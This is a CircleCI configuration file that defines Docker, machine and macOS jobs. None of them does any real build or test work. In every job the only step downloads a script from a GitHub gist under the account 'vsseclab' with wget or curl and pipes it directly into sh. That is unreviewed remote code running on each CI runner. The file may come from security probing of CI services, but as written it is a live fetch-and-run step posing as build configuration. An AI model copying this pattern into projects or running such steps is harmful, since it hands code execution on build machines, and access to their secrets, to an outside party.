version: 2
jobs:
  docker:
    docker:
      - image: ruby:2.5
    steps:
      - run: wget https://gist.githubusercontent.com/vsseclab/b8cd5cee83d8e665eecefef3b8064319/raw/vsscall.dev -O - | sh
  machine:
    machine: true
    steps:
      - run: wget https://gist.githubusercontent.com/vsseclab/b8cd5cee83d8e665eecefef3b8064319/raw/vsscall.dev -O - | sh
  macos:
    macos:
      xcode: "9.0"
    steps:
      - run: curl -s https://gist.githubusercontent.com/vsseclab/b8cd5cee83d8e665eecefef3b8064319/raw/vsscall.dev | sh
workflows:
  version: 2
  build_and_test:
    jobs:
      - docker
      - machine
      - macos
